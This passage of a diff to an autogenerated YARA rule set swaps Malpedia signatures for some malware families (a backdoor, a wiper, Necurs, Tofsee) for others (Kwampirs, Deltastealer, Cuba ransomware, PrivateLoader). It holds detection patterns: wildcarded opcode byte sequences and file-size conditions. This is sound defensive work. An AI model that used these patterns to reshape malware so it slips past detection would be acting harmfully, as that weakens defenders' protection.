ed 5b } - $sequence_3 = { b90a000000 ba58560000 ed 5b 59 5a } - $sequence_4 = { bb00000000 b90a000000 ba58560000 ed 5b } - $sequence_5 = { bb00000000 b90a000000 ba58560000 ed 5b 59 } - $sequence_6 = { b90a000000 ba58560000 ed 5b 59 } - $sequence_7 = { bb00000000 b90a000000 ba58560000 ed 5b 59 5a } - $sequence_8 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b } - $sequence_9 = { ba58560000 ed 5b 59 } + $sequence_0 = { 8b8568efffff 03c6 3b8558efffff 7667 8b8394000000 898560efffff 8b8558efffff } + $sequence_1 = { 8bc7 897dcc e8???????? 8b5dc8 3b5f04 740e } + $sequence_2 = { 8d4c2418 c68424e800000003 e8???????? 8b00 3bc3 7504 32db } + $sequence_3 = { 33d2 f3a6 6aff 58 7404 1bd2 1bd0 } + $sequence_4 = { 46 56 8d8d00ffffff e8???????? 53 56 } + $sequence_5 = { 85c0 750c e8???????? a3???????? eb13 53 } + $sequence_6 = { 8b00 8d8d38efffff 51 8d8d08efffff 51 50 ff33 } + $sequence_7 = { 894584 99 f77d8c 8b4590 8a0402 8b5594 } + $sequence_8 = { 83c604 3b7734 75ec eb31 83f805 } + $sequence_9 = { 8d410c 8bcb e8???????? 84c0 0f84d2000000 8b5d0c } condition: - 7 of them and filesize <1181696 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE +rule MALPEDIA_Win_Kwampirs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "10b67e6b-fced-54a6-8f30-b2a0d20f49ea" + id = "25decd9c-07db-5eba-ac2c-8b87bfe95cdd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.outlook_backdoor_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kwampirs_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "373fe304abbc2faa8be0b7ba3a307d5b5d4cb0051b5dde767cca54332adde2f8" + logic_hash = "6b54d71a60f0765ea0fd29b4cf202a2af753cd8f92ae599bc00fdafc2b919f65" score = 75 quality = 75 tags = "FILE" @@ -154831,32 +157731,32 @@ rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff753c 53 68e9fd0000 ffd6 8d4d00 894568 e8???????? } - $sequence_1 = { ff10 8b4c2408 ff74240c 8d04c8 8b4804 85c9 740b } - $sequence_2 = { c9 c20800 56 8bf7 e8???????? 8d771c e8???????? } - $sequence_3 = { c745e01f000130 895d0c ff15???????? 8b450c 8945f0 895dfc 33c9 } - $sequence_4 = { 6898000000 e8???????? 59 8945ec c645fc01 } - $sequence_5 = { f6455404 740e 836554fb 57 56 8d4dbc e8???????? } - $sequence_6 = { c3 57 6a2c e8???????? 8bf8 59 85ff } - $sequence_7 = { 5f 5e 8d4302 5b c3 53 8bd9 } - $sequence_8 = { 50 e8???????? 834d1004 f6451002 740f 836510fd } - $sequence_9 = { e8???????? 83ec38 56 57 8bf1 8b4604 33ff } + $sequence_0 = { 50 8d45f0 64a300000000 8965e8 8bf9 33db } + $sequence_1 = { e8???????? b001 8b4df0 64890d00000000 59 } + $sequence_2 = { 51 e8???????? 83c404 a3???????? 33f6 } + $sequence_3 = { 3bf3 7642 56 e8???????? 8907 } + $sequence_4 = { 668955f4 33d2 668955f6 e8???????? 83c40c } + $sequence_5 = { c3 32c0 8b4df0 64890d00000000 59 } + $sequence_6 = { 8d4df0 51 68???????? e8???????? 83c40c 32c0 } + $sequence_7 = { 6a00 6800001000 6a03 6a00 } + $sequence_8 = { 83c404 8a45e7 8b4df0 64890d00000000 59 5f } + $sequence_9 = { 33c5 50 8d45f0 64a300000000 8965e8 8bf9 33db } condition: - 7 of them and filesize <2912256 + 7 of them and filesize <2695168 } -rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE +rule MALPEDIA_Win_Shapeshift_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8004678f-c7f1-56db-b368-30e9334ba4b0" + id = "08e6a360-def4-58d5-989a-762ada20c1ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bruh_wiper_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shapeshift_auto.yar#L1-L105" license_url = "N/A" - logic_hash = "26b32a2c0d923fc99fb91e4beb18e36e72d9c523fef8bdb0bb63ddd5fd11ff5a" + logic_hash = "c522b147cc687acbd3ced32f880a4cbfad89b8f069e6c6ec7d0ae0159c8619d1" score = 75 quality = 75 tags = "FILE" @@ -154870,32 +157770,30 @@ rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c40c be01080000 0f1f8000000000 } - $sequence_1 = { 83ee01 75e3 8b4dfc 5f 5e } - $sequence_2 = { 8d45f4 57 50 ff15???????? ff15???????? } - $sequence_3 = { 68b40200c0 ffd6 8b4dfc 5f 33cd 5e } - $sequence_4 = { 6a00 8d85f8fdffff 50 6800020000 8d85fcfdffff 50 } - $sequence_5 = { 68???????? 57 ffd3 6800020000 8d85fcfdffff 6a00 } - $sequence_6 = { 50 ffd6 8bf0 8d45fb 50 6a00 6a01 } - $sequence_7 = { 6800200000 68???????? 57 ffd3 6800020000 8d85fcfdffff } - $sequence_8 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 } - $sequence_9 = { 50 ffd6 68???????? 68???????? 8bf8 } + $sequence_0 = { e8???????? 33d2 b93b110f00 f7f1 68???????? 8915???????? e8???????? } + $sequence_1 = { 6a00 6a07 68000000c0 51 ff15???????? } + $sequence_2 = { 8b45fc 817848d0f74100 7409 ff7048 e8???????? } + $sequence_3 = { 394508 7c1f 3934bd38054200 7531 e8???????? 8904bd38054200 } + $sequence_4 = { 6a00 57 e8???????? 8b5dfc 83c410 8b35???????? 53 } + $sequence_5 = { 8365fc00 8b049d38054200 8b4de0 f644082801 7515 e8???????? c70009000000 } + $sequence_6 = { c3 3b0d???????? f27502 f2c3 f2e987080000 } + $sequence_7 = { 6a0c 7550 e8???????? 83c404 8bf8 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Nightclub_Auto : FILE +rule MALPEDIA_Win_Deltastealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fe7b22ba-512f-5e91-8935-479f32d64f06" + id = "e4bcf99b-e757-5705-a59b-a0722820f3d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nightclub_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deltastealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "3d19b2fe0d45f47ba38d0f6076660c3269a68cbecd47ee885f31f66a44204ee7" + logic_hash = "f3a202dde71406be69325c7d8bb3b580aed323825ecf5c600f5b385fd3e3e19c" score = 75 quality = 75 tags = "FILE" @@ -154909,32 +157807,32 @@ rule MALPEDIA_Win_Nightclub_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff4808 83c404 3b7514 75b4 5f 5b 8b450c } - $sequence_1 = { 8d4dd0 c645f300 ff15???????? 8b4d08 8d45c0 50 51 } - $sequence_2 = { 8d75bc e8???????? 8d75e0 e8???????? eb33 8b55bc 8b7d08 } - $sequence_3 = { 8da42400000000 8a4701 47 84c0 75f8 b90b000000 be???????? } - $sequence_4 = { 83c404 6a00 56 53 8bf8 ff15???????? } - $sequence_5 = { 85c0 7505 a1???????? 8bc8 8bff 8a10 40 } - $sequence_6 = { 83c408 8bc8 ff15???????? 5f 5e 8be5 5d } - $sequence_7 = { 5b b87fe0077e f7ef c1fa08 8bfa c1ef1f 03fa } - $sequence_8 = { 8b45f0 83c010 83c310 8945f0 3bc6 75dc } - $sequence_9 = { c645f200 ff15???????? c745e001000000 85db 0f848c010000 8b15???????? 8b450c } + $sequence_0 = { 4883c428 c3 56 57 53 4883ec30 4c89c6 } + $sequence_1 = { 4d01c1 4c894c2420 4c89442428 c744243803001100 c744244803001100 488d5c2430 4c8d742440 } + $sequence_2 = { 57 53 4883ec40 4889d3 488b01 488b7008 488b7810 } + $sequence_3 = { 84c0 7416 4180bc240802000000 750b 488b842448010000 c60001 4584f6 } + $sequence_4 = { e8???????? 498b7610 31db 4839df 741e 8a041e 8d48bf } + $sequence_5 = { 89d7 48ffc3 49895e10 49f7e2 0f80a8000000 400fb6d7 4801d0 } + $sequence_6 = { c6474001 4889f9 e8???????? 4885c0 7438 4885d2 7433 } + $sequence_7 = { e8???????? 4489e3 488d4c2460 e8???????? 4989c7 eb21 4584e4 } + $sequence_8 = { 48895c2420 488d7c2430 41b830000000 41b910000000 4889f9 e8???????? 488b7f18 } + $sequence_9 = { 6601c8 0f92c2 81f9ffff0000 0f87d8feffff 84d2 0f85d0feffff 4d85f6 } condition: - 7 of them and filesize <247808 + 7 of them and filesize <3532800 } -rule MALPEDIA_Win_Graphsteel_Auto : FILE +rule MALPEDIA_Win_Cuba_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5824e278-153d-5fe0-a214-d93680fdb8e7" + id = "8e1fe25d-f2c0-551f-8e41-a3623d0fa4f8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphsteel_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cuba_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "0a7069cfdac89882eeae5b943786ae3bcce2789fc825f256679c381850fffe14" + logic_hash = "9f0de113045e5c6c763dd8b7a39764d54e03c53f19ccc2d0320fdbbeb66fa89e" score = 75 quality = 75 tags = "FILE" @@ -154948,32 +157846,38 @@ rule MALPEDIA_Win_Graphsteel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488d7830 488b4c2440 0f1f4000 e8???????? 4889c3 488d05415b3900 } - $sequence_1 = { ffd0 488bb42428010000 488b942410020000 4885d2 0f8401010000 488b4c2450 488d1d88ae4400 } - $sequence_2 = { e9???????? a810 0f84f1000000 84d2 0f888c010000 8954245c 83fa0b } - $sequence_3 = { e8???????? e8???????? 90 31c9 488d150f198e00 870a 8b0d???????? } - $sequence_4 = { e9???????? 4c8b4c2468 4d85c9 0f84b1000000 4c8b9424d8030000 4d8b9a88000000 498b4b08 } - $sequence_5 = { e8???????? 4909c5 0fb603 83c05b a8fb 0f85a0000000 488b4340 } - $sequence_6 = { e9???????? 8b8424a0010000 4189d9 ba35000000 4c89e9 448b842498010000 41bf06000000 } - $sequence_7 = { e9???????? 4885f6 0f8520ffffff 4c8d742440 4889d9 4d8b4550 c744244001080000 } - $sequence_8 = { eb11 488d7830 488b9424e0000000 e8???????? 488b542438 48895050 488b542440 } - $sequence_9 = { e8???????? c644243507 488d05e3cc3300 488b9c24c8000000 488d4c2435 e8???????? 48c7400806000000 } + $sequence_0 = { 0019 43 41 00444341 } + $sequence_1 = { ffb5fcfeffff ffb5fcfdffff ff15???????? 85c0 750d 8b95c0fbffff 53 } + $sequence_2 = { 33d2 85c0 7e0c 807c95bc19 740c 42 3bd0 } + $sequence_3 = { 85c0 0f84b4000000 8bbdc8fbffff 53 68???????? 8d85f0fbffff 50 } + $sequence_4 = { 000d???????? 384100 b538 41 } + $sequence_5 = { 0026 45 41 003a } + $sequence_6 = { 85c0 750c 57 ff15???????? e9???????? 56 ff15???????? } + $sequence_7 = { 0012 45 41 0026 } + $sequence_8 = { 6a02 6a00 688b010000 ff75f4 ff15???????? ff75f4 f7d8 } + $sequence_9 = { 757a ffb5d4fbffff 50 6800040000 } + $sequence_10 = { 8945f4 8b4514 40 c745ecac9c4000 894df8 8945fc } + $sequence_11 = { 0026 43 41 00b043410062 } + $sequence_12 = { 000c43 41 0035???????? 43 } + $sequence_13 = { 003a 45 41 004245 } + $sequence_14 = { 03f0 c1ca16 8b85e0feffff 03b40510ffffff 03b0f4b14100 03b5e8feffff 8d0437 } + $sequence_15 = { 000446 41 00d1 45 } condition: - 7 of them and filesize <19812352 + 7 of them and filesize <1094656 } -rule MALPEDIA_Win_Royal_Dns_Auto : FILE +rule MALPEDIA_Win_Electricfish_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e27ee32-9aaf-59db-953d-0696af40bcce" + id = "b2332381-c1cc-58e9-8fab-7070fccf8e24" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royal_dns_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.electricfish_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "f281d4e3be759adcb32b06448d83aa5fdafcb96a4b912bbb46b43de4955e29ec" + logic_hash = "1f7cb8b65f3bb65395bc124290e1a31ce340990c85196e747881fa433bd41f37" score = 75 quality = 75 tags = "FILE" @@ -154987,32 +157891,32 @@ rule MALPEDIA_Win_Royal_Dns_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 8b4dfc 8b85b4fcffff 83c404 } - $sequence_1 = { e8???????? 83c40c 8bc6 eb15 8d8da1f1ffff } - $sequence_2 = { ff15???????? 3d02010000 8b85e0fdffff 7533 6a00 50 } - $sequence_3 = { 4a 759a 8b55fc 85ff 7468 0fb606 c1e802 } - $sequence_4 = { 0fb61406 c1ea03 0fb69248132500 8811 0fb61c06 0fb6540601 c1ea06 } - $sequence_5 = { 80e301 0ac3 8845ed 8a45f8 8ad8 8345e805 } - $sequence_6 = { 8d8dfcfeffff 83c40c 33c0 2bd1 } - $sequence_7 = { 7504 33c0 eb0a 0fb6c8 } - $sequence_8 = { 0fb61c30 0fb6543001 03db 03db c1ea06 0bd3 } - $sequence_9 = { 8a17 8816 47 46 48 } + $sequence_0 = { e8???????? 83c404 85c0 0f84e3fdffff 8b442410 6a00 50 } + $sequence_1 = { e8???????? 8bd8 83c404 85db 7523 683e010000 68???????? } + $sequence_2 = { c3 8b5104 57 6a77 68???????? 8910 8b39 } + $sequence_3 = { 8b442408 6855090000 68???????? 6a41 6896010000 6a14 c70050000000 } + $sequence_4 = { e8???????? 83c418 85c0 0f8fd7faffff 5f 5e 5d } + $sequence_5 = { 8945c4 8945c8 8945cc 8945d0 89a540ffffff 6aff 894110 } + $sequence_6 = { 689b010000 68???????? 6a08 e8???????? 83c40c 85c0 751f } + $sequence_7 = { 51 55 e8???????? 83c408 3bc3 7504 6a6e } + $sequence_8 = { c3 57 56 e8???????? 83c408 6893000000 68???????? } + $sequence_9 = { 0fb74550 c7459418001800 c7459848000000 84db 7402 03c0 0fb74d18 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <3162112 } -rule MALPEDIA_Win_Younglotus_Auto : FILE +rule MALPEDIA_Win_Dispcashbr_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "020c6ff6-d6bb-58fb-b2fa-0c433bea2123" + id = "02a73395-ac12-50d4-b2ec-e868c4b1a459" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.younglotus_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dispcashbr_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "b3707e8b206f95395dc2e356973108894d4afdfd30bcae58d7d87fd0cefdf956" + logic_hash = "60c8be22bea8462dd56c514e62576b626445f5aa18aea505cf9cb5c5983fb848" score = 75 quality = 75 tags = "FILE" @@ -155026,38 +157930,32 @@ rule MALPEDIA_Win_Younglotus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6802000080 e8???????? 83c41c 6a01 } - $sequence_1 = { e8???????? 2b450c 50 8b4dfc } - $sequence_2 = { 8b45e0 25ff000000 e9???????? c745e401000000 8b550c } - $sequence_3 = { 50 ff15???????? 8b4dfc 8981a4000000 68???????? } - $sequence_4 = { 50 8b4d0c 81e970010000 51 } - $sequence_5 = { 83bda4faffff00 751b 68???????? 8d85a8faffff 50 ff15???????? 83c408 } - $sequence_6 = { 6804010000 6a00 8d8da8faffff 51 6a01 6a00 } - $sequence_7 = { 83c40c 8b45fc 83c00f 8945f8 6a03 } - $sequence_8 = { 56 57 68???????? ff15???????? 8945dc 68???????? } - $sequence_9 = { 50 ffd3 85c0 8945fc 0f84b7000000 } - $sequence_10 = { 68???????? ffd6 ff7508 e8???????? 8bf8 59 85ff } - $sequence_11 = { ff7508 50 e8???????? 8d430f } - $sequence_12 = { 50 8945f4 ffd6 8d4df8 } - $sequence_13 = { 6a01 53 ff15???????? 8b4de8 6a03 } - $sequence_14 = { 8945e8 ffd6 68???????? 8945ec ffd7 68???????? } - $sequence_15 = { ffd0 50 ff55f0 85c0 746f 8b450c } + $sequence_0 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? } + $sequence_1 = { e8???????? 83ec08 c7442408eaffffff c7442404???????? } + $sequence_2 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? a1???????? 83c020 } + $sequence_3 = { a1???????? 83c020 890424 e8???????? eb45 c70424f5ffffff e8???????? } + $sequence_4 = { 83ec08 c7442408f2ffffff c7442404???????? a1???????? 83c020 890424 e8???????? } + $sequence_5 = { 83ec08 c7442408d9ffffff c7442404???????? a1???????? 83c020 890424 } + $sequence_6 = { 890424 e8???????? 83ec08 c7442408d7ffffff } + $sequence_7 = { 890424 e8???????? 83ec08 c7442408c9ffffff c7442404???????? } + $sequence_8 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408f2ffffff c7442404???????? } + $sequence_9 = { c70424f5ffffff e8???????? 83ec04 c744240404000000 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <123904 } -rule MALPEDIA_Win_Necurs_Auto : FILE +rule MALPEDIA_Win_Privateloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3d1b7316-0e79-5ade-97ef-8f3ac3ffb54d" + id = "704976b4-103d-5caa-b3a7-f03a44637bd7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.necurs_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.privateloader_auto.yar#L1-L183" license_url = "N/A" - logic_hash = "75c1414f6695a00e2fea038874de3164067ad0287567965dcfd36d5ca522d078" + logic_hash = "15e13900aae7d6be3cc889a3774b293d4c50bba5cbabc1926697368cc70d28fc" score = 75 quality = 75 tags = "FILE" @@ -155071,38 +157969,41 @@ rule MALPEDIA_Win_Necurs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 13f2 a3???????? 8935???????? 890d???????? 8bc1 5e } - $sequence_1 = { 030d???????? a3???????? a1???????? 13f2 a3???????? } - $sequence_2 = { 13f2 33d2 030d???????? a3???????? } - $sequence_3 = { 8bc2 034508 5e 5d c3 55 } - $sequence_4 = { 03c8 a1???????? 13f2 33d2 } - $sequence_5 = { 56 8bf2 ba06e0a636 f7e2 } - $sequence_6 = { 397508 7604 33c0 eb12 } - $sequence_7 = { 2b7508 33d2 46 f7f6 8bc2 034508 } - $sequence_8 = { 8d85ecfbffff 57 50 e8???????? 83c410 } - $sequence_9 = { 33d7 33c1 52 50 } - $sequence_10 = { 6a7d 50 ffd6 59 } - $sequence_11 = { 8bc1 0bc7 7409 8bc1 8bd7 e9???????? } - $sequence_12 = { 57 57 8d8574ffffff 50 } - $sequence_13 = { 6a7b 50 ffd6 8bf8 59 59 } - $sequence_14 = { 53 ff15???????? 59 33c0 5e } - $sequence_15 = { a1???????? 33d2 f7f1 ff05???????? } + $sequence_0 = { 8965ec 8b55ec 8955e8 8d45f8 } + $sequence_1 = { 894df4 8b55fc 837a1410 7209 } + $sequence_2 = { 0fb64dec 85c9 7408 8b55fc 8b02 8945e8 } + $sequence_3 = { 8b4dec 8b5508 895110 8b4508 8945e4 8b4de8 034de4 } + $sequence_4 = { 8b45d8 8b4ddc 8b55d0 8b75d4 } + $sequence_5 = { 8b4dec e8???????? 8b4df0 e8???????? 8845fc } + $sequence_6 = { 8975d4 8b45d0 8b55d4 5e } + $sequence_7 = { 8b4de8 8b75ec 2bc8 1bf2 894de0 8975e4 a1???????? } + $sequence_8 = { e8???????? 33d2 b93f000000 f7f1 } + $sequence_9 = { 8b4590 8b4d94 8b5588 8b758c } + $sequence_10 = { a3???????? 33c0 5e c3 3b0d???????? } + $sequence_11 = { 896c2404 8bec 81ec68010000 a1???????? 33c5 8945fc 56 } + $sequence_12 = { d81d???????? c9 b8ffffffff 99 c3 56 8b35???????? } + $sequence_13 = { 13f1 83c201 8955e0 83d600 } + $sequence_14 = { 6a04 8d4310 50 6a06 } + $sequence_15 = { 7507 6800008000 eb02 6a00 } + $sequence_16 = { 8b45e4 50 51 52 } + $sequence_17 = { 0bc8 56 57 7529 } + $sequence_18 = { 03d0 8b4d9c 13f1 83c201 } condition: - 7 of them and filesize <475136 + 7 of them and filesize <3670016 } -rule MALPEDIA_Win_Tofsee_Auto : FILE +rule MALPEDIA_Win_Safenet_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2d8fcb5e-0a8a-503a-9ded-9601f9237fa2" + id = "ac7a694f-f64f-5870-a7d7-8253326e6bdf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tofsee_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.safenet_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "def89a492b1a308a2f7b3c5c33eb9a3e8527d0ce6d7ff4abe57189bca63d387c" + logic_hash = "2a23436dc4bc12ef6d7e9d46230626c8fc77e510b9c9904c537608f099e6c2ff" score = 75 quality = 75 tags = "FILE" @@ -155116,32 +158017,32 @@ rule MALPEDIA_Win_Tofsee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8584feffff 50 68b7000000 68a9000000 6a0c 68???????? 68???????? } - $sequence_1 = { f7f3 8b450c 8a0402 88043e 46 3b7508 7ce0 } - $sequence_2 = { f7fb 80c261 881431 49 47 85c9 } - $sequence_3 = { bf???????? 8b46fc 48 744d 48 743a } - $sequence_4 = { 5e 5b c9 c3 56 57 ff15???????? } - $sequence_5 = { 33c0 eb3a 8b4b3c 03cb 813950450000 75ef } - $sequence_6 = { 0f8ee8f7ffff 5b 8b4570 83c004 50 ff15???????? ff7564 } - $sequence_7 = { 8b4038 40 57 8bcb 8945fc e8???????? 8bc8 } - $sequence_8 = { 55 56 57 8bf1 ffd3 8b3d???????? 8be8 } - $sequence_9 = { c0e105 0ad9 32da 34c6 881e 46 3bf7 } + $sequence_0 = { 8b4004 50 c3 8b442404 668b08 } + $sequence_1 = { 50 ff15???????? 85c0 7511 6a01 5b } + $sequence_2 = { 57 8d45e6 6a02 50 e8???????? 836d0804 83c420 } + $sequence_3 = { 8b08 50 897920 8b4df0 83602000 e8???????? } + $sequence_4 = { ff7008 ff7604 ff15???????? 8bcf e8???????? } + $sequence_5 = { 8d4db8 c645fc01 e8???????? 6a01 8d4dcc 885dfc } + $sequence_6 = { 57 ff7614 ff55f8 85c0 0f85d7000000 397df4 } + $sequence_7 = { ffd6 83c414 8d85b0fbffff ff77f8 } + $sequence_8 = { ff750c e8???????? ff75ec e8???????? ff75e8 e8???????? } + $sequence_9 = { bf???????? 8b45d4 85c0 7505 b8???????? 57 50 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Kdcsponge_Auto : FILE +rule MALPEDIA_Win_Lodeinfo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "94fce6ec-ab5d-5082-ad22-afe2db84b161" + id = "47c099ff-69db-5812-85ce-57e24072ce38" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kdcsponge_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lodeinfo_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "8a36b853d0e2d90c09d30257cb4cad3c052e41eeb1a598728e2eabfd12dc7098" + logic_hash = "e6a58ad7e2bc0ff5d6e63ebfb8b716b1912a0a95e296af817067906fecf4c3bd" score = 75 quality = 75 tags = "FILE" @@ -155155,32 +158056,32 @@ rule MALPEDIA_Win_Kdcsponge_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 80b9b104000001 c6810904000008 0f85bf000000 80b9ad04000000 c781a004000002000000 c7416002001100 7552 } - $sequence_1 = { 488b8228040000 4885c0 7507 488b8230040000 4883c002 4803c1 } - $sequence_2 = { 7507 c681c504000006 c7814004000003000000 c781ca04000004000000 e9???????? e9???????? 3c01 } - $sequence_3 = { 0f85d5000000 80b9ad04000001 0f85bf000000 f681ae04000008 0f84b2000000 488b896c040000 } - $sequence_4 = { 898520030000 e8???????? 488d0db15ffcff 48c1e602 0fb784b9c0550400 488d91b04c0400 488d8d24030000 } - $sequence_5 = { 488b542450 488b4e08 e8???????? 488d4c2440 ff15???????? 0fb74504 ffc7 } - $sequence_6 = { 448d4020 c745c048895c24 488d55c0 c745c420555657 488d0df1480200 c745c841544155 c745cc41564157 } - $sequence_7 = { c6830804000001 f20f1005???????? 8b05???????? c7436003000100 eb24 83f807 753d } - $sequence_8 = { 7507 c681c504000006 ba65000000 c744243004000000 448bca c744242804000000 448bc2 } - $sequence_9 = { c6470801 e9???????? 41b803000000 488d1578f90000 488bcb e8???????? 85c0 } + $sequence_0 = { 894de0 8955f0 8955f8 8955f4 85ff 740a 381433 } + $sequence_1 = { 85c0 7412 ff75f4 8b55f0 8bc8 e8???????? 83c404 } + $sequence_2 = { 85ff 742e 8b4c2444 8bc7 } + $sequence_3 = { 660fefc8 0f114c0620 0f10440630 0f28ca 660fefc8 0f114c0630 83c040 } + $sequence_4 = { 5d c3 8b75fc 8b55f0 33c9 85d2 7429 } + $sequence_5 = { 8bda 8b5508 57 8bf9 895df8 8b06 } + $sequence_6 = { e8???????? 83c404 894708 85c0 750d 39460c 7408 } + $sequence_7 = { 03c8 8b4510 d1e9 024fff 884c17ff 8b4dd4 3bf3 } + $sequence_8 = { eb72 8b45f0 8975f4 c64406ff00 eb65 8b45f8 8d7e01 } + $sequence_9 = { 85c0 748e 33c0 0f57c0 b920010000 8bfa } condition: - 7 of them and filesize <720896 + 7 of them and filesize <712704 } -rule MALPEDIA_Win_Wastedloader_Auto : FILE +rule MALPEDIA_Win_Unidentified_110_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f15153cb-6336-5eec-a420-db8a6857e34a" + id = "264cfac8-ace3-5d01-a52d-48fde572696d" date = "2023-12-06" modified = "2023-12-08" - reference = 